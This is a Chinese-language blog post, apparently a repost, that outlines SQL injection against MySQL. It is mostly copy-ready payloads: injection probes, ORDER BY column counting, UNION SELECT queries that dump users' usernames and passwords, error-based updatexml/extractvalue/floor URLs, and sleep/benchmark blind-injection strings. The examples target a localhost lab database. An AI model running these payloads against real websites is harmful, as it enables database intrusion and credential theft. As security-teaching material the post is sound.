SQL注入——SQL注入流程
其他
2020-03-20 10:19:53
阅读次数: 0
1、判断是否有注入
|
- and 1=1
- and 1=2
- and 3-2=1
- and 3-1=1
- ‘ “ ) ‘) “) ‘)) “)) ` 测出页面异常
- ‘ and 1=1 -- -
- ‘ and 1=2 -- -
- ‘ and 3-2=1 -- -
- ‘ and 3-1=1 -- -
|
|
- 判断字段个数
- sql.php?id=1 order by 1,2,3,4
- 在order by 字段个数不大于查询字段个数时,语句会正常执行,当字段个数大于查询字段个数时,语句会报错。
|
|
- union select 1,2,3
- 可以看到2和3输出在页面中,就可以确定这两个参数会输出。
|
|
- union select 1,version(),database()
|
2、union注入
|
|
|
- union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security'
|
|
- union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users'
|
|
- union select 1,group_concat(username),group_concat(password) from users
|
|
|
3、基于错误显示的注入
- http://localhost/sql-1.php?id=-1 and
- updatexml(1,concat(0x7e,database()),1)
|
|
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name),21,20)from information_schema.schemata) ),1)
|
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') ),1)
|
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ) ),1)
|
- http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from security.users ) ),1)
|
4、盲注之报错注入
|
|
- 2、extractvalue(arg1,arg2) :从目标XML中返回包含所查询值的字符串,arg1为是String格式,为XML文档对象的名称。arg2为Xpath格式的字符串。
|
- 语句:select extractvalue(1,concat(0x7e,(select user()),0x7e))
- 返回结果:XPATH syntax error: '~root@localhost~
|
- 3、updatexml(arg1,arg2,arg3):改变文档中符合条件的节点的值,arg1位xml文档对象的名称,arg2为xpath格式的字符串,arg3,String格式,替换查找到的符合条件的数据。
|
- 语句:select updatexml(1,concat(0x7e,(select user()),0x7e),1)
- 返回结果:XPATH syntax error: '~root@localhost~
|
- 4、floor(arg1):函数只返回arg1整数部分,小数部分舍弃。
|
- 语句:select 1,(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a),3
- 返回结果:Duplicate entry 'root@localhost1' for key 'group_key’
|
- 5、Extractvalue() updatexml()
|
|
|
- 1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#
|
|
- 1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#
|
5、基于查询时间的注入
|
- benchmark(arg1,arg2) arg1为操作的函数,arg2为操作次数
- 语句:select if(1=1, benchmark(5000000,md5('abc')), 'goodbye')
- 返回结果:页面延迟2秒显示
|
|
- sleep(arg1) arg1中断的时间单位为秒。
- 语句:select if(1=1, sleep(3), 'goodbye')
- 返回结果:页面延迟3秒显示
|
|
- and if((length(database()))>5),sleep(5),0)
- and (length(database()))>5
- and (length(database()))=4
|
|
- and (ascii(substr(database(),n,1)))>100
|
|
- and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1)))>100
|
|
- and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100
|
|
- and (ascii(substr(( select password from users limit 0,1),1,1)))=68
|
6、获取数据库信息
7、破解数据
8、提升权限
9、内网渗透
发布了36 篇原创文章 ·
获赞 130 ·
访问量 2062
转载自blog.csdn.net/cldimd/article/details/104970395